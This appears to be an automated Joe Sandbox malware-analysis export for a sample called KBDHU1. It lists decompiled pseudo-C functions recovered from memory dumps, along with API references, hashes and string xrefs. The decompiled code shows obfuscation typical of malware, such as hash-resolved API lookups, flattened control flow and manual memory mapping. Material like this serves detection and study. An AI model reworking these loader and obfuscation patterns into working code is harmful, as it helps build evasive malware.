Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c1200b13c070f05c698c698cfca9046aa84543201c5c84f649f45b29b9edc421
Instruction ID: 507098fe5597caaa0dbe7c90f18506305a415e8938354234642f9a578ef7f9e2
Opcode Fuzzy Hash: c1200b13c070f05c698c698cfca9046aa84543201c5c84f649f45b29b9edc421
Instruction Fuzzy Hash: 64117C75B44300ABE728EB64D851B7672E6BB90700F94889CE545CF2C0EFB8F945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02346F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E02346F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E023434C0(__ecx);
				if( *0x234ddc4 == 0) {
					 *0x234ddc4 = E02343E80(__ebx, E02343F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x234e2e8; // 0x72c0e0
				 *(_t17 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x234dea8;
				if(_t7 == 0) {
					_t7 = E02343E80(_t15, E02343F20(0xbb398380), 0x97f883e, _t31);
					 *0x234dea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x234e1a0;
				if(_t9 == 0) {
					_t9 = E02343E80(_t15, E02343F20(0xbb398380), 0x26c3f343, _t31);
					 *0x234e1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x02346f10
0x02346f12
0x02346f19
0x02346f22
0x02346f3a
0x02346f3a
0x02346f40
0x02346f42
0x02346f48
0x02346f4c
0x02346f53
0x02346f66
0x02346f6b
0x02346f6b
0x02346f72
0x02346f74
0x02346f7b
0x02346f8e
0x02346f93
0x02346f93
0x02346fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,0234704F,023468DC), ref: 02346F40

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af859cf72a29794e6437881c5daea471e8c55ee25cd92a285fbe252b8d250455
Instruction ID: f741be73b5926c207d4b4e8db2eaa5d3b7d3a7c4a85aeb0cc38ea61ab9d0eff6
Opcode Fuzzy Hash: af859cf72a29794e6437881c5daea471e8c55ee25cd92a285fbe252b8d250455
Instruction Fuzzy Hash: 8C016779B412016B9728BBB5A45062B22DBDBC1754B140DEDF445C7344DE30FC524FD1

Uniqueness

Uniqueness Score: -1.00%

Function 022E0010, Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 022E0B88
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 022E0BBA
Part of subcall function 022E0B50: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 022E0BFB

Part of subcall function 022E0990: VirtualAlloc.KERNEL32(?,?,00000000), ref: 022E09E6
Part of subcall function 022E0990: RtlMoveMemory.NTDLL(00000000,?,?), ref: 022E09F5
Part of subcall function 022E0990: RtlMoveMemory.NTDLL(00000000,?,00000028), ref: 022E0A26
Part of subcall function 022E0990: VirtualAlloc.KERNEL32(?,?,00000000), ref: 022E0A41
Part of subcall function 022E0990: RtlMoveMemory.NTDLL(00000000,?,?), ref: 022E0A6E
Part of subcall function 022E0990: RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 022E0A8B

Part of subcall function 022E01F0: GetCurrentProcess.KERNEL32(?,?), ref: 022E0238
Part of subcall function 022E01F0: NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,?), ref: 022E0253
Part of subcall function 022E01F0: GetProcessHeap.KERNEL32(?,?,?), ref: 022E026E
Part of subcall function 022E01F0: HeapFree.KERNEL32(00000000,00000001,00000000,?,?,?), ref: 022E0277
Part of subcall function 022E01F0: GetProcessHeap.KERNEL32(?,?,?), ref: 022E027C
Part of subcall function 022E01F0: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 022E0289
Part of subcall function 022E01F0: GetCurrentProcess.KERNEL32(?,?,?), ref: 022E0290
Part of subcall function 022E01F0: NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,?,?), ref: 022E02A3
Part of subcall function 022E01F0: RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 022E02CA
Part of subcall function 022E01F0: RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 022E02E1
Part of subcall function 022E01F0: RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 022E0303

VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 022E008E

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: Memory$Move$Process$Heap$Virtual$AllocCurrentFreeInformationQuery$AllocateFill
String ID:
API String ID: 3609892891-0
Opcode ID: db14c8e7be463ca880be51c24ceba23fe284fb317b28796201c3a9830a12affd
Instruction ID: 78cdbc0081987ac807bd28206ddbbdceaa9c27365a3609c99daf8b6624c8bb3d
Opcode Fuzzy Hash: db14c8e7be463ca880be51c24ceba23fe284fb317b28796201c3a9830a12affd
Instruction Fuzzy Hash: 210196755243017BDA10E7E4C841FAF73EEAFC4300F40891DB189A7144DAB4E6469FA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02341FB0, Relevance: 4.0, Strings: 3, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02341FB0(intOrPtr* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t26;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t40;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t54;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr _t60;
				intOrPtr _t66;
				intOrPtr* _t85;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				void* _t99;

				_t58 = __ecx;
				_t88 =  *((intOrPtr*)(_t96 + 0x1c));
				_t95 = __edx;
				 *((intOrPtr*)(_t96 + 0x10)) = __ecx;
				_t57 = 0;
				_t26 = 0x1e37d88e;
				while(1) {
					L1:
					_t91 =  *((intOrPtr*)(_t96 + 0x18));
					goto L2;
					do {
						while(1) {
							L2:
							_t98 = _t26 - 0x27643e76;
							if(_t98 > 0) {
								break;
							}
							if(_t98 == 0) {
								_t26 = 0x1f9931a7;
								continue;
							} else {
								_t99 = _t26 - 0x1f9931a7;
								if(_t99 > 0) {
									__eflags = _t26 - 0x234da148;
									if(_t26 == 0x234da148) {
										__eflags = _t57;
										if(_t57 == 0) {
											E02344250(_t57,  *_t95);
										}
										goto L44;
									} else {
										__eflags = _t26 - 0x23930c9c;
										if(_t26 != 0x23930c9c) {
											goto L40;
										} else {
											_t44 =  *0x234e120; // 0x0
											__eflags = _t44;
											if(_t44 == 0) {
												_t44 = E02343E80(_t57, E02343F20(0x667fdee), 0x207605dd, _t95);
												 *0x234e120 = _t44;
											}
											_t60 =  *0x234e2e4; // 0x78f028
											_t13 = _t60 + 0x1c; // 0x790110
											_t45 =  *_t44( *((intOrPtr*)(_t96 + 0x28)), _t91, 0x60,  *_t13, 0, 0);
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											__eflags = _t45;
											_t26 = 0x3134f996;
											_t57 =  !=  ? 1 : _t57;
											continue;
										}
									}
								} else {
									if(_t99 == 0) {
										_t47 =  *0x234dea8;
										_t93 =  *((intOrPtr*)(_t58 + 4)) + 0xffffff8c;
										 *((intOrPtr*)(_t95 + 4)) = _t93;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02343E80(_t57, E02343F20(0xbb398380), 0x97f883e, _t95);
											 *0x234dea8 = _t47;
										}
										_t89 =  *_t47();
										_t49 =  *0x234dcec;
										__eflags = _t49;
										if(_t49 == 0) {
											_t49 = E02343E80(_t57, E02343F20(0xbb398380), 0xe9233692, _t95);
											 *0x234dcec = _t49;
										}
										_t50 =  *_t49(_t89, 8, _t93);
										 *_t95 = _t50;
										__eflags = _t50;
										if(_t50 == 0) {
											L44:
											return _t57;
										} else {
											_t58 =  *((intOrPtr*)(_t96 + 0x10));
											_t91 =  *_t58;
											 *((intOrPtr*)(_t96 + 0x18)) = _t91;
											_t88 =  *((intOrPtr*)(_t58 + 4)) - 0x74;
											 *((intOrPtr*)(_t96 + 0x1c)) = _t91 + 0x74;
											_t26 = 0x3ac56b1d;
											continue;
										}
									} else {
										if(_t26 == 0x72b6082) {
											_t54 =  *0x234daac;
											_t94 =  *_t95;
											__eflags = _t54;
											if(_t54 == 0) {
												_t54 = E02343E80(_t57, E02343F20(0xe66945e6), 0x70f7b8ec, _t95);
												 *0x234daac = _t54;
											}
											 *_t54(_t94,  *((intOrPtr*)(_t96 + 0x20)), _t88);
											_t58 =  *((intOrPtr*)(_t96 + 0x1c));
											_t96 = _t96 + 0xc;
											_t26 = 0x3126cae3;
											goto L1;
										} else {
											if(_t26 != 0x1e37d88e) {
												goto L40;
											} else {
												_t26 = 0x323ed498;
												continue;
											}
										}
									}
								}
							}
							L45:
						}
						__eflags = _t26 - 0x323ed498;
						if(__eflags > 0) {
							__eflags = _t26 - 0x3ac56b1d;
							if(_t26 != 0x3ac56b1d) {
								goto L40;
							} else {
								_t28 =  *0x234def8;
								__eflags = _t28;
								if(_t28 == 0) {
									_t28 = E02343E80(_t57, E02343F20(0x667fdee), 0xb11f83b0, _t95);
									 *0x234def8 = _t28;
								}
								_t66 =  *0x234e2e4; // 0x78f028
								_t24 = _t66 + 0x18; // 0x78fdd0
								_t29 =  *_t28( *_t24, 0, 0, _t96 + 0x14);
								_t58 =  *((intOrPtr*)(_t96 + 0x10));
								asm("sbb eax, eax");
								_t26 = ( ~_t29 & 0xe3ddbf3a) + 0x234da148;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t58 + 4)) - 0x74;
								if( *((intOrPtr*)(_t58 + 4)) < 0x74) {
									goto L44;
								} else {
									_t26 = 0x27643e76;
									goto L2;
								}
							} else {
								__eflags = _t26 - 0x3126cae3;
								if(_t26 == 0x3126cae3) {
									_t85 =  *0x234df8c; // 0x0
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E02343E80(_t57, E02343F20(0x667fdee), 0x47a72724, _t95);
										 *0x234df8c = _t85;
									}
									_t34 =  *0x234e2e4; // 0x78f028
									_t20 = _t34 + 0x20; // 0x78fc90
									_t35 =  *_t85( *_t20,  *((intOrPtr*)(_t96 + 0x24)), 1, 0,  *_t95, _t95 + 4);
									_t58 =  *((intOrPtr*)(_t96 + 0x10));
									asm("sbb eax, eax");
									_t26 = ( ~_t35 & 0xf25e1306) + 0x3134f996;
									goto L2;
								} else {
									__eflags = _t26 - 0x3134f996;
									if(_t26 != 0x3134f996) {
										goto L40;
									} else {
										_t40 =  *0x234e168;
										__eflags = _t40;
										if(_t40 == 0) {
											_t40 = E02343E80(_t57, E02343F20(0x667fdee), 0xae646c41, _t95);
											 *0x234e168 = _t40;
										}
										 *_t40( *((intOrPtr*)(_t96 + 0x14)));
										_t58 =  *((intOrPtr*)(_t96 + 0x10));
										_t26 = 0x234da148;
										goto L2;
									}
								}
							}
						}
						goto L45;
						L40:
						__eflags = _t26 - 0x6df8497;
					} while (_t26 != 0x6df8497);
					return _t57;
					goto L45;
				}
			}

0x02341fb0
0x02341fb7
0x02341fbb
0x02341fbd
0x02341fc1
0x02341fc3
0x02341fc8
0x02341fc8
0x02341fc8
0x02341fc8
0x02341fd0
0x02341fd0
0x02341fd0
0x02341fd0
0x02341fd5
0x00000000
0x00000000
0x02341fdb
0x02342133
0x00000000
0x02341fe1
0x02341fe1
0x02341fe6
0x023420cb
0x023420d0
0x0234226f
0x02342271
0x02342276
0x02342276
0x00000000
0x023420d6
0x023420d6
0x023420db
0x00000000
0x023420e1
0x023420e1
0x023420e6
0x023420e8
0x023420fb
0x02342100
0x02342100
0x02342105
0x0234210f
0x02342119
0x0234211b
0x0234211f
0x02342126
0x0234212b
0x00000000
0x0234212b
0x023420db
0x02341fec
0x02341fec
0x02342047
0x0234204c
0x0234204f
0x02342052
0x02342054
0x02342067
0x0234206c
0x0234206c
0x02342073
0x02342075
0x0234207a
0x0234207c
0x0234208f
0x02342094
0x02342094
0x0234209d
0x0234209f
0x023420a2
0x023420a4
0x0234227e
0x02342284
0x023420aa
0x023420aa
0x023420ae
0x023420b3
0x023420b7
0x023420bd
0x023420c1
0x00000000
0x023420c1
0x02341fee
0x02341ff3
0x02342007
0x0234200c
0x0234200f
0x02342011
0x02342024
0x02342029
0x02342029
0x02342034
0x02342036
0x0234203a
0x0234203d
0x00000000
0x02341ff5
0x02341ffa
0x00000000
0x02342000
0x02342000
0x00000000
0x02342000
0x02341ffa
0x02341ff3
0x02341fec
0x02341fe6
0x00000000
0x02341fdb
0x0234213d
0x02342142
0x02342204
0x02342209
0x00000000
0x0234220b
0x0234220b
0x02342210
0x02342212
0x02342225
0x0234222a
0x0234222a
0x02342234
0x0234223e
0x02342241
0x02342243
0x02342249
0x02342250
0x00000000
0x02342250
0x02342148
0x02342148
0x023421f0
0x023421f4
0x00000000
0x023421fa
0x023421fa
0x00000000
0x023421fa
0x0234214e
0x0234214e
0x02342153
0x02342198
0x0234219e
0x023421a0
0x023421b8
0x023421ba
0x023421ba
0x023421c0
0x023421d4
0x023421d7
0x023421d9
0x023421df
0x023421e6
0x00000000
0x02342155
0x02342155
0x0234215a
0x00000000
0x02342160
0x02342160
0x02342165
0x02342167
0x0234217a
0x0234217f
0x0234217f
0x02342188
0x0234218a
0x0234218e
0x00000000
0x0234218e
0x0234215a
0x02342153
0x02342148
0x00000000
0x0234225a
0x0234225a
0x0234225a
0x0234226e
0x00000000
0x0234226e

Strings

Ei, xrefs: 02342013
v>d', xrefs: 023421FA
v>d', xrefs: 02341FD0

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID:
String ID: v>d'$v>d'$Ei
API String ID: 0-262821485
Opcode ID: 465681183ceb35c4987dbbd7834a495d527ca8d2428277629382c0fd6ed6075c
Instruction ID: 4aab84756491284a72c80618e7bfca72c098bea5d78fefdb30b6401f2cb4a85d
Opcode Fuzzy Hash: 465681183ceb35c4987dbbd7834a495d527ca8d2428277629382c0fd6ed6075c
Instruction Fuzzy Hash: C161E575B04201ABCB28DE659850B2B33E6BB84744F1049DAFC46DB350DF31F842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02349FA0, Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02349FA0(char* __ecx, intOrPtr __edx) {
				char _v524;
				char _v1044;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				intOrPtr* _v1068;
				intOrPtr _v1072;
				char* _v1076;
				intOrPtr _v1080;
				intOrPtr* _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1108;
				intOrPtr _v1112;
				void* __ebx;
				void* __ebp;
				void* _t39;
				signed int _t40;
				intOrPtr* _t43;
				signed int _t46;
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t56;
				intOrPtr* _t58;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr* _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t97;
				intOrPtr _t98;
				char* _t99;
				intOrPtr _t100;
				intOrPtr _t134;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				char* _t152;
				void* _t153;
				char _t155;
				intOrPtr _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t99 = __ecx;
				_t157 =  &_v1084;
				_v1080 = __edx;
				_v1076 = __ecx;
				_t39 = 0x1a29c84b;
				while(1) {
					L1:
					_t97 = _v1068;
					while(1) {
						_t155 = _v1064;
						do {
							while(1) {
								L3:
								_t158 = _t39 - 0x1bec2acf;
								if(_t158 > 0) {
									break;
								}
								if(_t158 == 0) {
									_t56 =  *0x234dea8;
									__eflags = _t56;
									if(_t56 == 0) {
										_t99 = E02343F20(0xbb398380);
										_t56 = E02343E80(_t97, _t99, 0x97f883e, _t155);
										 *0x234dea8 = _t56;
									}
									_t146 =  *_t56();
									_t58 =  *0x234e1a0;
									__eflags = _t58;
									if(_t58 == 0) {
										_t99 = E02343F20(0xbb398380);
										_t58 = E02343E80(_t97, _t99, 0x26c3f343, _t155);
										 *0x234e1a0 = _t58;
									}
									 *_t58(_t146, 0, _t97);
									_t147 = _v1088;
									_t39 = 0x1dedf83c;
									continue;
								} else {
									_t159 = _t39 - 0x191840a9;
									if(_t159 > 0) {
										__eflags = _t39 - 0x1a29c84b;
										if(_t39 == 0x1a29c84b) {
											_t62 =  *0x234dea8;
											__eflags = _t62;
											if(_t62 == 0) {
												_t99 = E02343F20(0xbb398380);
												_t62 = E02343E80(_t97, _t99, 0x97f883e, _t155);
												 *0x234dea8 = _t62;
											}
											_t148 =  *_t62();
											_t64 =  *0x234dcec;
											__eflags = _t64;
											if(_t64 == 0) {
												_t99 = E02343F20(0xbb398380);
												_t64 = E02343E80(_t97, _t99, 0xe9233692, _t155);
												 *0x234dcec = _t64;
											}
											_t65 =  *_t64(_t148, 8, 0x48);
											_v1084 = _t65;
											__eflags = _t65;
											if(_t65 == 0) {
												return _t65;
											} else {
												_t147 = _v1088;
												_t39 = 0x1fc710ef;
												continue;
											}
										} else {
											__eflags = _t39 - 0x1a44b2a5;
											if(_t39 != 0x1a44b2a5) {
												goto L45;
											} else {
												_t152 = E023434C0(0x234da50);
												_t69 =  *0x234dc60;
												__eflags = _t69;
												if(_t69 == 0) {
													_t69 = E02343E80(_t97, E02343F20(0xe66945e6), 0xcca28b0d, _t155);
													 *0x234dc60 = _t69;
												}
												 *_t69( &_v1044, 0x104, _t152,  &_v524, _t97);
												_t157 = _t157 + 0x14;
												_t99 = _t152;
												E02343460(_t99);
												_t147 = _v1076;
												_t39 = 0x10f8a433;
												continue;
											}
										}
									} else {
										if(_t159 == 0) {
											_t100 = _v1072;
											 *((intOrPtr*)(_t100 + 0x24)) = _t147;
											_t73 =  *0x234e2dc; // 0x0
											 *((intOrPtr*)(_t100 + 0x20)) = _t73;
											 *0x234e2dc = _t100;
											return _t73;
										} else {
											if(_t39 == 0xa70e03e) {
												_t74 =  *0x234dc70;
												__eflags = _t74;
												if(_t74 == 0) {
													_t99 = E02343F20(0xbb398380);
													_t74 = E02343E80(_t97, _t99, 0x560d239b, _t155);
													 *0x234dc70 = _t74;
												}
												 *_t74(_v1056);
												_t39 = 0x191840a9;
												continue;
											} else {
												if(_t39 == 0x10f8a433) {
													_push(0);
													_push(_t99);
													_t99 = 0;
													E02344BA0(_t97, 0,  &_v1044, _t155, 1);
													_t157 = _t157 + 0xc;
													_t39 = 0x1bec2acf;
													continue;
												} else {
													if(_t39 != 0x18d473c5) {
														goto L45;
													} else {
														_t149 =  *0x234e2ec; // 0x78e578
														_t78 =  *0x234e024;
														_t150 = _t149 + 0x278;
														_v1052 = _t150;
														if(_t78 == 0) {
															_t99 = E02343F20(0xbb398380);
															_t78 = E02343E80(_t97, _t99, 0x5262aefc, _t155);
															 *0x234e024 = _t78;
														}
														_t79 =  *_t78(_t150);
														_t151 =  *0x234ded0;
														_v1052 = 2 + _t79 * 2;
														if(_t151 == 0) {
															_t99 = E02343F20(0xbb398380);
															_t151 = E02343E80(_t97, _t99, 0x23563937, _t155);
															 *0x234ded0 = _t151;
														}
														_t156 = _t151;
														if(_t151 == 0) {
															_t99 = E02343F20(0xbb398380);
															_t151 = E02343E80(_t97, _t99, 0x23563937, _t156);
															 *0x234ded0 = _t151;
														}
														_t98 = _t151;
														if(_t151 == 0) {
															_t99 = E02343F20(0xbb398380);
															 *0x234ded0 = E02343E80(_t98, _t99, 0x23563937, _t156);
														}
														_t144 =  *0x234dce8; // 0x0
														if(_t144 == 0) {
															_t99 = E02343F20(0xbb398380);
															_t144 = E02343E80(_t98, _t99, 0xb310a228, _t156);
															 *0x234dce8 = _t144;
														}
														_t85 =  *_t144(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
														_t147 = _v1108;
														_t134 = _v1112;
														asm("sbb eax, eax");
														_t39 = ( ~_t85 & 0x069deb97) + 0x1f9eb481;
														goto L1;
													}
												}
											}
										}
									}
								}
								L60:
							}
							__eflags = _t39 - 0x1fc710ef;
							if(__eflags > 0) {
								__eflags = _t39 - 0x263ca018;
								if(_t39 == 0x263ca018) {
									_t99 =  &_v1056;
									_t40 = E0234B3A0(_t99,  &_v1064);
									asm("sbb eax, eax");
									_t39 = ( ~_t40 & 0x28f9ad68) + 0xa70e03e;
									_t155 = _v1064;
									goto L3;
								} else {
									__eflags = _t39 - 0x336a8da6;
									if(_t39 != 0x336a8da6) {
										goto L45;
									} else {
										_t99 = _t155;
										_t43 = E02341140(_v1060);
										_t134 = _v1080;
										_t97 = _t43;
										__eflags = _t97;
										_v1068 = _t97;
										_t39 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
										goto L3;
									}
								}
							} else {
								if(__eflags == 0) {
									_t99 = _t147;
									_t46 = E0234AB50(_t99, _t134,  &_v524);
									_t134 = _v1080;
									_t157 = _t157 + 4;
									asm("sbb eax, eax");
									_t39 = ( ~_t46 & 0xf935bf44) + 0x1f9eb481;
									goto L3;
								} else {
									__eflags = _t39 - 0x1dedf83c;
									if(_t39 == 0x1dedf83c) {
										_t49 =  *0x234dea8;
										__eflags = _t49;
										if(_t49 == 0) {
											_t99 = E02343F20(0xbb398380);
											_t49 = E02343E80(_t97, _t99, 0x97f883e, _t155);
											 *0x234dea8 = _t49;
										}
										_t153 =  *_t49();
										_t51 =  *0x234e1a0;
										__eflags = _t51;
										if(_t51 == 0) {
											_t99 = E02343F20(0xbb398380);
											_t51 = E02343E80(_t97, _t99, 0x26c3f343, _t155);
											 *0x234e1a0 = _t51;
										}
										 *_t51(_t153, 0, _t155);
										_t147 = _v1088;
										_t39 = 0xa70e03e;
										_t134 = _v1092;
										goto L3;
									} else {
										__eflags = _t39 - 0x1f9eb481;
										if(_t39 == 0x1f9eb481) {
											return E02344250(_t97, _v1072);
										}
										goto L45;
									}
								}
							}
							goto L60;
							L45:
							__eflags = _t39 - 0x1c40b504;
						} while (_t39 != 0x1c40b504);
						return _t39;
						goto L60;
					}
				}
			}

0x02349fa0
0x02349fa0
0x02349fab
0x02349fb0
0x02349fb4
0x02349fb9
0x02349fb9
0x02349fb9
0x02349fc2
0x02349fc2
0x02349fd0
0x02349fd0
0x02349fd0
0x02349fd0
0x02349fd5
0x00000000
0x00000000
0x02349fdb
0x0234a25f
0x0234a264
0x0234a266
0x0234a277
0x0234a279
0x0234a27e
0x0234a27e
0x0234a285
0x0234a287
0x0234a28c
0x0234a28e
0x0234a29f
0x0234a2a1
0x0234a2a6
0x0234a2a6
0x0234a2af
0x0234a2b1
0x0234a2b5
0x00000000
0x02349fe1
0x02349fe1
0x02349fe6
0x0234a17a
0x0234a17f
0x0234a1ee
0x0234a1f3
0x0234a1f5
0x0234a206
0x0234a208
0x0234a20d
0x0234a20d
0x0234a214
0x0234a216
0x0234a21b
0x0234a21d
0x0234a22e
0x0234a230
0x0234a235
0x0234a235
0x0234a23f
0x0234a241
0x0234a245
0x0234a247
0x0234a416
0x0234a24d
0x0234a24d
0x0234a251
0x00000000
0x0234a256
0x0234a181
0x0234a181
0x0234a186
0x00000000
0x0234a18c
0x0234a196
0x0234a198
0x0234a19d
0x0234a19f
0x0234a1b2
0x0234a1b7
0x0234a1b7
0x0234a1d0
0x0234a1d2
0x0234a1d5
0x0234a1d7
0x0234a1dc
0x0234a1e0
0x00000000
0x0234a1e5
0x0234a186
0x02349fec
0x02349fec
0x0234a3e3
0x0234a3e7
0x0234a3ea
0x0234a3ef
0x0234a3f2
0x0234a402
0x02349ff2
0x02349ff7
0x0234a142
0x0234a147
0x0234a149
0x0234a15a
0x0234a15c
0x0234a161
0x0234a161
0x0234a16a
0x0234a170
0x00000000
0x02349ffd
0x0234a002
0x0234a121
0x0234a123
0x0234a12a
0x0234a12c
0x0234a135
0x0234a138
0x00000000
0x0234a008
0x0234a00d
0x00000000
0x0234a013
0x0234a013
0x0234a019
0x0234a01e
0x0234a024
0x0234a02a
0x0234a03b
0x0234a03d
0x0234a042
0x0234a042
0x0234a048
0x0234a04a
0x0234a057
0x0234a05d
0x0234a06e
0x0234a075
0x0234a077
0x0234a077
0x0234a07d
0x0234a081
0x0234a092
0x0234a099
0x0234a09b
0x0234a09b
0x0234a0a1
0x0234a0a5
0x0234a0b6
0x0234a0bf
0x0234a0bf
0x0234a0c5
0x0234a0cd
0x0234a0de
0x0234a0e5
0x0234a0e7
0x0234a0e7
0x0234a104
0x0234a106
0x0234a10c
0x0234a110
0x0234a117
0x00000000
0x0234a117
0x0234a00d
0x0234a002
0x02349ff7
0x02349fec
0x02349fe6
0x00000000
0x02349fdb
0x0234a2c3
0x0234a2c8
0x0234a389
0x0234a38e
0x0234a3c3
0x0234a3c7
0x0234a3d2
0x0234a3d9
0x02349fc2
0x00000000
0x0234a390
0x0234a390
0x0234a395
0x00000000
0x0234a39b
0x0234a39f
0x0234a3a1
0x0234a3a6
0x0234a3aa
0x0234a3ac
0x0234a3ae
0x0234a3b7
0x00000000
0x0234a3b7
0x0234a395
0x0234a2ce
0x0234a2ce
0x0234a367
0x0234a36a
0x0234a36f
0x0234a373
0x0234a378
0x0234a37f
0x00000000
0x0234a2d4
0x0234a2d4
0x0234a2d9
0x0234a2fc
0x0234a301
0x0234a303
0x0234a314
0x0234a316
0x0234a31b
0x0234a31b
0x0234a322
0x0234a324
0x0234a329
0x0234a32b
0x0234a33c
0x0234a33e
0x0234a343
0x0234a343
0x0234a34c
0x0234a34e
0x0234a352
0x0234a357
0x00000000
0x0234a2db
0x0234a2db
0x0234a2e0
0x00000000
0x0234a407
0x00000000
0x0234a2e0
0x0234a2d9
0x0234a2ce
0x00000000
0x0234a2e6
0x0234a2e6
0x0234a2e6
0x0234a2fb
0x00000000
0x0234a2fb
0x02349fc2

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0234A0FB
GetCurrentProcess.KERNEL32(00000000), ref: 0234A0FE
GetCurrentProcess.KERNEL32(00000000), ref: 0234A101

Strings

>p, xrefs: 02349FF2
79V#, xrefs: 0234A0B1
Ei, xrefs: 0234A1A1
xx, xrefs: 0234A013
79V#, xrefs: 0234A069
>p, xrefs: 0234A352
79V#, xrefs: 0234A08D

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p$>p$xx$Ei
API String ID: 2050909247-247184429
Opcode ID: 4fc3a39d78c2bd4f098b807c5992db4b0c65bf9ff88ced1b25eb7dae089b027f
Instruction ID: 37858235dfcca82b19e20e76695d957119456b2ae3f307c30c5c413c5aee06ae
Opcode Fuzzy Hash: 4fc3a39d78c2bd4f098b807c5992db4b0c65bf9ff88ced1b25eb7dae089b027f
Instruction Fuzzy Hash: 27A1B2B5B853019BC724EA64A49062F32EAEBC4744F644AE9F845D7340EE35FD428BD2

Uniqueness

Uniqueness Score: -1.00%

Function 02349FC8, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 69%

